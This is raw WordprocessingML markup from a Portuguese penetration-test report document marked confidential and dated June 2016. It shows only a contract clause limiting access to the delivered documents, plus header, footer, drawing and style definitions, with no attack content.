        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRATANTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45319EDC" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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BA845A0" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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1B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6. A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATANTE </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>está ciente que:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183CD97" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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5872D1C0" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a. Os documentos entregues (impressos ou eletrônicos) serão de acesso exclusivo aos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E59FEC" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03DF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76245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>responsáveis</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> pela empresa contratante e/ou área contratante.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidSect="009D3B4B">
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="default" r:id="rId25"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1417" w:right="1701" w:bottom="141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7F897" w14:textId="77777777" w:rsidR="003E09EB" w:rsidRDefault="003E09EB" w:rsidP="009D3B4B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="32A273DA" w14:textId="77777777" w:rsidR="003E09EB" w:rsidRDefault="003E09EB" w:rsidP="009D3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-Bold">
    <w:altName w:val="Helvetica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5A012" w14:textId="77777777" w:rsidR="00776B5A" w:rsidRDefault="00776B5A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BB3D25" wp14:editId="412558B5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9" name="Retângulo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5194B" w14:textId="77777777" w:rsidR="00776B5A" w:rsidRDefault="00776B5A">
                          <w:pPr>
                            <w:jc w:val="right"/>
                          </w:pPr>
                          <w:r w:rsidRPr="009D3B4B">
                            <w:rPr>
                              <w:b/>
                              <w:i/>
                              <w:color w:val="FF0000"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> CONFIDENCIAL</w:t>
                          </w:r>
                          <w:r w:rsidRPr="009D3B4B">
                            <w:rPr>
                              <w:color w:val="FF0000"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> </w:t>
                          </w:r>
                          <w:r>
                            <w:t xml:space="preserve">- </w:t>
                          </w:r>
                          <w:sdt>
                            <w:sdtPr>
                              <w:alias w:val="Data"/>
                              <w:id w:val="7747683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6-01T00:00:00Z">
                                <w:dateFormat w:val="d 'de' MMMM 'de' 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t>1 de junho de 2016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03BB3D25" id="Ret_x00e2_ngulo_x0020_459" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:467.65pt;height:58.3pt;z-index:251663360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VoKbcCAACgBQAADgAAAGRycy9lMm9Eb2MueG1srFRbbtQwFP1HYg+W/9M86sxMomaqdjJBSAUq&#10;CgvwJE5ikdjB9kymIDbDVtgY155n2x8E5CPy4/r4nnuO79X1tu/QhinNpchweBFgxEQpKy6aDH/+&#10;VHgzjLShoqKdFCzDj0zj6/nrV1fjkLJItrKrmEIAInQ6DhlujRlS39dly3qqL+TABGzWUvXUwFQ1&#10;fqXoCOh950dBMPFHqapByZJpDav5bhPPHX5ds9J8qGvNDOoyDLkZ91fuv7J/f35F00bRoeXlPg36&#10;F1n0lAu49AiVU0PRWvEXUD0vldSyNhel7H1Z17xkjgOwCYNnbB5aOjDHBYqjh2OZ9P+DLd9v7hXi&#10;VYZJnGAkaA8ifWTm10/RrDuJ7CrUaBx0CqEPw72yLPVwJ8svGgm5aKlo2I1ScmwZrSCz0Mb7Tw7Y&#10;iYajaDW+kxVcQNdGunJta9VbQCgE2jpVHo+qsK1BJSzGyWUSxjFGJexNSUBCJ5tP08PpQWnzhske&#10;2UGGFaju0OnmThubDU0PIfYyIQvedU55uANC7KK9zQn2PQmS5Ww5Ix6JJkuPBHnu3RQL4k2KcBrn&#10;l/likYc/LH5I0pZXFRMW7mCekPyZOHsb72Q/2kfLjlcWzqakVbNadAptKJi3cJ+rLeycwvynaTiy&#10;wOUZpTAiwW2UeMVkNvVIQWIvmQYzLwiT22QSkITkxVNKd1ywf6eExgwncRQ7Nc6SfsYtcN9LbjTt&#10;uYH20PE+w7NjEE2t1ZaichIayrvd+KwUNv1TKUD/g9DOmNaLO0+b7Wrr3B8dXL6S1SM4VUkwEjQM&#10;aG0waKX6htEIbSLD+uuaKoZR91aA25OQENtX3AQG6nx15SYknkawQ0UJMBk2h+HC7PrQelC8aeGW&#10;0JVJyBt4HTV3xrUvZ5fR/k1BG3C89i3L9pnzuYs6Ndb5bwAAAP//AwBQSwMEFAAGAAgAAAAhAAOn&#10;AH7YAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoUyoiCHEqFIHEtS2I&#10;6zZeEoO9jmK3DX/PwgUuI61mNPO2Xs/BqyNNyUU2sFwUoIi7aB33Bl52T1e3oFJGtugjk4EvSrBu&#10;zs9qrGw88YaO29wrKeFUoYEh57HSOnUDBUyLOBKL9x6ngFnOqdd2wpOUB6+vi6LUAR3LwoAjtQN1&#10;n9tDMKBj65771+jbHTq/eUv2gx+zMZcX88M9qExz/gvDD76gQyNM+3hgm5Q3II/kXxXvbnWzArWX&#10;0LIsQTe1/k/ffAMAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAA&#10;AAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBsxWgptwIAAKAFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQADpwB+2AAAAAUBAAAP&#10;AAAAAAAAAAAAAAAAAA8FAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFAYAAAAA&#10;" filled="f" stroked="f">
              <v:textbox inset=",0">
                <w:txbxContent>
                  <w:p w14:paraId="5025194B" w14:textId="77777777" w:rsidR="00776B5A" w:rsidRDefault="00776B5A">
                    <w:pPr>
                      <w:jc w:val="right"/>
                    </w:pPr>
                    <w:r w:rsidRPr="009D3B4B">
                      <w:rPr>
                        <w:b/>
                        <w:i/>
                        <w:color w:val="FF0000"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> CONFIDENCIAL</w:t>
                    </w:r>
                    <w:r w:rsidRPr="009D3B4B">
                      <w:rPr>
                        <w:color w:val="FF0000"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                    <w:r>
                      <w:t xml:space="preserve">- </w:t>
                    </w:r>
                    <w:sdt>
                      <w:sdtPr>
                        <w:alias w:val="Data"/>
                        <w:id w:val="77476837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6-06-01T00:00:00Z">
                          <w:dateFormat w:val="d 'de' MMMM 'de' yyyy"/>
                          <w:lid w:val="pt-BR"/>
                          <w:storeMappedDataAs w:val="dateTime"/>
                          <w:calendar w:val="gregorian"/>
                        </w:date>
                      </w:sdtPr>
                      <w:sdtContent>
                        <w:r>
                          <w:t>1 de junho de 2016</w:t>
                        </w:r>
                      </w:sdtContent>
                    </w:sdt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0C8EE4C" wp14:editId="476AAB95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838200"/>
              <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
              <wp:wrapNone/>
              <wp:docPr id="460" name="Grupo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Grupo 460" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:6pt;height:66pt;z-index:251662336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Xv7wAIAAP0KAAAOAAAAZHJzL2Uyb0RvYy54bWzsVstu2zAQvBfoPxC6O3pYdm0hcpBati9p&#10;GyDpB9AU9UAlkiBpy0bRf++SlJXGadAiBQIUyEUiucvV7swsxcurQ9ugPZWq5iz1wovAQ5QRntes&#10;TL2v9+vRzENKY5bjhjOaekeqvKvF+3eXnUhoxCve5FQiCMJU0onUq7QWie8rUtEWqwsuKANjwWWL&#10;NUxl6ecSdxC9bfwoCKZ+x2UuJCdUKVjNnNFb2PhFQYn+UhSKatSkHuSm7VPa59Y8/cUlTkqJRVWT&#10;Pg38gixaXDP46BAqwxqjnayfhGprIrnihb4gvPV5UdSE2hqgmjA4q2Yj+U7YWsqkK8UAE0B7htOL&#10;w5LP+1uJ6jz14ingw3ALJG3kTnBkFgCeTpQJeG2kuBO30tUIwxtOvikw++d2My+dM9p2n3gOAfFO&#10;cwvPoZCtCQGFo4Nl4TiwQA8aEVj8MAViPUTAMp3HwWTiSCIVMGk2RbMIzGCN5+PBtuo3h8ZmtoZj&#10;GJn8cOI+ahPtEzNVgd7UA6Tq3yC9q7CglillwBogDU+QXgMC1glFDlTrt2QOUXJgPaKI8WWFWUmt&#10;8/1RAHqhrcNkDKHdFjNRQMcfEf4NWCecnwMKJ0IqvaG8RWaQekpLXJeVXnLGoKG4DC2XeH+jtEP4&#10;tMFQy/i6bhpYx0nDUJd680k0sRsUb+rcGI1NyXK7bCTaY+jMeD0LP2Y9XY/coANYboNVFOerfqxx&#10;3bgx0NswEw+qgnT6kWu97/NgvpqtZvEojqarURxk2eh6vYxH03X4YZKNs+UyC3+Y1MI4qeo8p8xk&#10;dzoGwvjvNNEfSK6Bh4NggMF/HN0qEpI9vW3SoE3HpxPmlufHW2mg7WX6anqNnup1/Mp6nZ0395te&#10;3/T63Pk6fqrX+HX1Cn+os5/Rm17/Q73a2wHcseyx3N8HzSXu17k9jx9urYufAAAA//8DAFBLAwQU&#10;AAYACAAAACEAeT8/pNoAAAAEAQAADwAAAGRycy9kb3ducmV2LnhtbEyPT0/DMAzF70h8h8hIXBBL&#10;GQih0nSa+HNgF7bRCzev8dqKxqmabAv79Hhc4GL76VnPPxez5Hq1pzF0ng3cTDJQxLW3HTcGqo/X&#10;6wdQISJb7D2TgW8KMCvPzwrMrT/wivbr2CgJ4ZCjgTbGIdc61C05DBM/EIu39aPDKHJstB3xIOGu&#10;19Msu9cOO5YLLQ701FL9td45A8vFy9vd82p+rFK1SNurd4ufx2jM5UWaP4KKlOLfMpzwBR1KYdr4&#10;HdugegPySPytJ28qaiP9VgZdFvo/fPkDAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEA&#10;ABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h&#10;/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdRF7&#10;+8ACAAD9CgAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA&#10;eT8/pNoAAAAEAQAADwAAAAAAAAAAAAAAAAAaBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA&#10;8wAAACE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C7E85" w14:textId="77777777" w:rsidR="003E09EB" w:rsidRDefault="003E09EB" w:rsidP="009D3B4B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="234D2B10" w14:textId="77777777" w:rsidR="003E09EB" w:rsidRDefault="003E09EB" w:rsidP="009D3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52609" w14:textId="77777777" w:rsidR="00776B5A" w:rsidRDefault="00776B5A">
    <w:pPr>
      <w:pStyle w:val="Header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7A1D86C5" wp14:editId="59C81D5D">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-710334</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-202392</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="982518" cy="308264"/>
          <wp:effectExtent l="0" t="0" r="8255" b="0"/>
          <wp:wrapThrough wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="0" y="0"/>
              <wp:lineTo x="0" y="19596"/>
              <wp:lineTo x="21223" y="19596"/>
              <wp:lineTo x="21223" y="0"/>
              <wp:lineTo x="0" y="0"/>
            </wp:wrapPolygon>
          </wp:wrapThrough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sec_borda_bran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518" cy="308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D1B64E7" wp14:editId="4EFAF63E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:posOffset>1760220</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="topMargin">
                <wp:posOffset>320202</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3614523" cy="257986"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="475" name="Caixa de Texto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4523" cy="25798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54207" w14:textId="77777777" w:rsidR="00776B5A" w:rsidRPr="009D3B4B" w:rsidRDefault="00776B5A">
                          <w:pPr>
                            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            <w:jc w:val="right"/>
                            <w:rPr>
                              <w:i/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="009D3B4B">
                            <w:rPr>
                              <w:i/>
                            </w:rPr>
                            <w:t xml:space="preserve">Relatório de Teste de Intrusão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75" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:138.6pt;margin-top:25.2pt;width:284.6pt;height:20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seswIAAKUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtu2zAMfR+wfxD07vpSJbGNOkUbx8OA&#10;7gK0+wDFlmNhtuRJSuxu2L+PkpM0bTFg2KYHQRfqkIc84tX12LVoz5TmUmQ4vAgwYqKUFRfbDH95&#10;KLwYI22oqGgrBcvwI9P4evn2zdXQpyySjWwrphCACJ0OfYYbY/rU93XZsI7qC9kzAZe1VB01sFVb&#10;v1J0APSu9aMgmPuDVFWvZMm0htN8usRLh1/XrDSf6lozg9oMQ2zGzcrNGzv7yyuabhXtG14ewqB/&#10;EUVHuQCnJ6icGop2ir+C6nippJa1uShl58u65iVzHIBNGLxgc9/QnjkukBzdn9Kk/x9s+XH/WSFe&#10;ZZgsZhgJ2kGRVpSPFFUMPbDRSGRvIE9Dr1Mwv+/hgRlv5Qj1dpx1fyfLrxoJuWqo2LIbpeTQMFpB&#10;nKF96Z89nXC0BdkMH2QF7ujOSAc01qqzSYS0IECHej2eagSRoBIOL+chmUWXGJVwF80WSTx3Lmh6&#10;fN0rbd4x2SG7yLACDTh0ur/TxkZD06OJdSZkwdvW6QB8gIk9tN5c+X4kQbKO1zHxSDRfeyTIc++m&#10;WBFvXoSLWX6Zr1Z5+NPihyRteFUxYeGOUgrJn5XqIOpJBCcxadnyysLZkLTablatQnsKUi7cOBA/&#10;M/Ofh+HIApcXlMKIBLdR4hXzeOGRgsy8ZBHEXhAmt8k8IAnJi+eU7rhg/04JDRlOZtFsEs1vuQVu&#10;vOZG044baBYt7zIcn4xoaqW2FpUroaG8ndZnqbDhP6UC6n8stBOm1eKkSjNuRkCxat3I6hEkqiQo&#10;CHQIHQ4WjVTfMRqgW2RYf9tRxTBq3wuQeRISYtuL28BCnZ9ujqdUlACR4dIojKbNykzNaNcrvm3A&#10;x/SlhLyBT1Fzp9eneA5fCXqBo3PoW7bZnO+d1VN3Xf4CAAD//wMAUEsDBBQABgAIAAAAIQArs6bw&#10;4gAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUhsELUT0gchToUqFdFlS1vR&#10;nRubJGCPo9htw98zrGA3ozm6c24xH5xlZ9OH1qOEZCSAGay8brGWsH1b3s+AhahQK+vRSPg2Aebl&#10;9VWhcu0vuDbnTawZhWDIlYQmxi7nPFSNcSqMfGeQbh++dyrS2tdc9+pC4c7yVIgJd6pF+tCoziwa&#10;U31tTk6C3T8c+G63ELhaJi+H8fr1/fMuk/L2Znh+AhbNEP9g+NUndSjJ6ehPqAOzEtLpNCVUwlhk&#10;wAiYZRMajhIeEwG8LPj/BuUPAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAM9l6x6zAgAA&#10;pQUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhACuzpvDi&#10;AAAACQEAAA8AAAAAAAAAAAAAAAAADQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAc&#10;BgAAAAA=&#10;" o:allowincell="f" filled="f" stroked="f">
              <v:textbox inset=",0,,0">
                <w:txbxContent>
                  <w:p w:rsidR="002D15D5" w:rsidRPr="009D3B4B" w:rsidRDefault="002D15D5">
                    <w:pPr>
                      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      <w:jc w:val="right"/>
                      <w:rPr>
                        <w:i/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="009D3B4B">
                      <w:rPr>
                        <w:i/>
                      </w:rPr>
                      <w:t xml:space="preserve">Relatório de Teste de Intrusão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CC579F9" wp14:editId="0EE509F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080135" cy="170815"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="476" name="Caixa de Texto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08F0AF8F" w14:textId="77777777" w:rsidR="00776B5A" w:rsidRDefault="00776B5A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445F1F" w:rsidRPr="00445F1F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579F9" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Caixa_x0020_de_x0020_Texto_x0020_476" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.85pt;margin-top:0;width:85.05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4HDgcCAADwAwAADgAAAGRycy9lMm9Eb2MueG1srFPbbtswDH0fsH8Q9L7Y7tLLjDhFlyLDgO4C&#10;tPsARpZjYbaoUUrs7OtHyUkbdG/DXgRRJA95yKPF7dh3Yq/JG7SVLGa5FNoqrI3dVvLH0/rdjRQ+&#10;gK2hQ6sredBe3i7fvlkMrtQX2GJXaxIMYn05uEq2Ibgyy7xqdQ9+hk5bdjZIPQQ2aZvVBAOj9112&#10;kedX2YBUO0KlvefX+8kplwm/abQK35rG6yC6SnJvIZ2Uzk08s+UCyi2Ba406tgH/0EUPxnLRZ6h7&#10;CCB2ZP6C6o0i9NiEmcI+w6YxSicOzKbIX7F5bMHpxIWH493zmPz/g1Vf999JmLqS8+srKSz0vKQV&#10;mBFErcWTHgOK6OE5Dc6XHP7oOCGMH3HkfSfO3j2g+umFxVULdqvviHBoNdTcZxEzs7PUCcdHkM3w&#10;BWsuB7uACWhsqI9D5LEIRud9HZ53xJ0IFUvmN3nx/lIKxb7iOr8pLlMJKE/Zjnz4pLEX8VJJYg0k&#10;dNg/+BC7gfIUEot57Ey9Nl2XjKg7vepI7IEVA0ppGyYOryK5nyNcJBf5TMzCuBnTPFNW9G2wPjBb&#10;wkl8/Fn40iL9lmJg4VXS/9oBaSm6z5Yn9qGYz6NSk8EXOn/dnF7BKoaopAokxWSswqTrnSOzbbnG&#10;aTt3PN+1SdRf+jluhWWVJnL8AlG353aKevmoyz8AAAD//wMAUEsDBBQABgAIAAAAIQBt7dLG2wAA&#10;AAQBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8JAEIXvJv6HzZh4ky0cQGq3BE3Am1HwILehO7bF&#10;7mzdXdry7124yGWSl/fy3jfZYjCN6Mj52rKC8SgBQVxYXXOp4HO7engE4QOyxsYyKTiRh0V+e5Nh&#10;qm3PH9RtQiliCfsUFVQhtKmUvqjIoB/Zljh639YZDFG6UmqHfSw3jZwkyVQarDkuVNjSS0XFz+Zo&#10;FHTPs9PBHX7D8Lp7/9Lr3fJta3ul7u+G5ROIQEP4D8MZP6JDHpn29sjai0ZBfCRc7tmbJWMQewWT&#10;6Rxknslr+PwPAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA2n4HDgcCAADwAwAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAbe3SxtsAAAAEAQAADwAA&#10;AAAAAAAAAAAAAABfBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAGcFAAAAAA==&#10;" o:allowincell="f" fillcolor="#4f81bd [3204]" stroked="f">
              <v:textbox style="mso-fit-shape-to-text:t" inset=",0,,0">
                <w:txbxContent>
                  <w:p w14:paraId="08F0AF8F" w14:textId="77777777" w:rsidR="00776B5A" w:rsidRDefault="00776B5A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445F1F" w:rsidRPr="00445F1F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07610"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D45C841E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3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440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="28296DA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE7E42E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D744C0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9506A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466051C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDA21D3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440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="571D3621"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1AAA9A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6F2"/>
    <w:rsid w:val="00012EFD"/>
    <w:rsid w:val="001262ED"/>
    <w:rsid w:val="001A49AA"/>
    <w:rsid w:val="001B03DF"/>
    <w:rsid w:val="001F4D70"/>
    <w:rsid w:val="002B7D58"/>
    <w:rsid w:val="002C4168"/>
    <w:rsid w:val="002D0928"/>
    <w:rsid w:val="002D15D5"/>
    <w:rsid w:val="002D3C29"/>
    <w:rsid w:val="002D4082"/>
    <w:rsid w:val="002E5EAE"/>
    <w:rsid w:val="00352A7D"/>
    <w:rsid w:val="003961C8"/>
    <w:rsid w:val="003A2A3B"/>
    <w:rsid w:val="003C50ED"/>
    <w:rsid w:val="003E09EB"/>
    <w:rsid w:val="003E4D87"/>
    <w:rsid w:val="003E62DA"/>
    <w:rsid w:val="003F596C"/>
    <w:rsid w:val="00402EA2"/>
    <w:rsid w:val="004150D4"/>
    <w:rsid w:val="00420C12"/>
    <w:rsid w:val="00421A01"/>
    <w:rsid w:val="00445F1F"/>
    <w:rsid w:val="00462BDE"/>
    <w:rsid w:val="004816B1"/>
    <w:rsid w:val="004933EB"/>
    <w:rsid w:val="00493D68"/>
    <w:rsid w:val="004D61B3"/>
    <w:rsid w:val="00527137"/>
    <w:rsid w:val="00555AA8"/>
    <w:rsid w:val="005929B3"/>
    <w:rsid w:val="00593769"/>
    <w:rsid w:val="005A2E4A"/>
    <w:rsid w:val="005D7F3E"/>
    <w:rsid w:val="005E6338"/>
    <w:rsid w:val="005F56A5"/>
    <w:rsid w:val="00621774"/>
    <w:rsid w:val="0063357F"/>
    <w:rsid w:val="00640235"/>
    <w:rsid w:val="006504F0"/>
    <w:rsid w:val="0066336D"/>
    <w:rsid w:val="006736F2"/>
    <w:rsid w:val="00685FFB"/>
    <w:rsid w:val="00697A76"/>
    <w:rsid w:val="006C0750"/>
    <w:rsid w:val="006E3E30"/>
    <w:rsid w:val="00706CB3"/>
    <w:rsid w:val="00740683"/>
    <w:rsid w:val="0075030A"/>
    <w:rsid w:val="0076245B"/>
    <w:rsid w:val="00770FF4"/>
    <w:rsid w:val="00776B5A"/>
    <w:rsid w:val="00786AFD"/>
    <w:rsid w:val="00825095"/>
    <w:rsid w:val="008441FE"/>
    <w:rsid w:val="008D2AB5"/>
    <w:rsid w:val="00940DE4"/>
    <w:rsid w:val="009636FC"/>
    <w:rsid w:val="00987A5F"/>
    <w:rsid w:val="009D3B4B"/>
    <w:rsid w:val="009D686C"/>
    <w:rsid w:val="009E12D3"/>
    <w:rsid w:val="00A03D21"/>
    <w:rsid w:val="00A5030A"/>
    <w:rsid w:val="00A5690D"/>
    <w:rsid w:val="00A815B8"/>
    <w:rsid w:val="00A8664C"/>
    <w:rsid w:val="00A96D37"/>
    <w:rsid w:val="00AA20F1"/>
    <w:rsid w:val="00AA6292"/>
    <w:rsid w:val="00AB611E"/>
    <w:rsid w:val="00B07E0E"/>
    <w:rsid w:val="00B14C46"/>
    <w:rsid w:val="00B16B70"/>
    <w:rsid w:val="00B876B2"/>
    <w:rsid w:val="00BA10E1"/>
    <w:rsid w:val="00BB0152"/>
    <w:rsid w:val="00BD3E3F"/>
    <w:rsid w:val="00BF0152"/>
    <w:rsid w:val="00C07F3F"/>
    <w:rsid w:val="00C54515"/>
    <w:rsid w:val="00C904BA"/>
    <w:rsid w:val="00C9101E"/>
    <w:rsid w:val="00C9351F"/>
    <w:rsid w:val="00C95713"/>
    <w:rsid w:val="00C9795C"/>
    <w:rsid w:val="00D17DBD"/>
    <w:rsid w:val="00D20B7B"/>
    <w:rsid w:val="00D77983"/>
    <w:rsid w:val="00D81233"/>
    <w:rsid w:val="00D82358"/>
    <w:rsid w:val="00DA015F"/>
    <w:rsid w:val="00DB08DD"/>
    <w:rsid w:val="00DF272E"/>
    <w:rsid w:val="00E02FC1"/>
    <w:rsid w:val="00E21271"/>
    <w:rsid w:val="00E42214"/>
    <w:rsid w:val="00E95520"/>
    <w:rsid w:val="00F20858"/>
    <w:rsid w:val="00F726BD"/>
    <w:rsid w:val="00FE2A7D"/>
    <w:rsid w:val="00FF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E5E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40" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="851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1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36F2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C957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C9571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C9571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A10E1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F4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D70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E212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D3B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B4B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009D3B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B4B"/>
  </w:style>
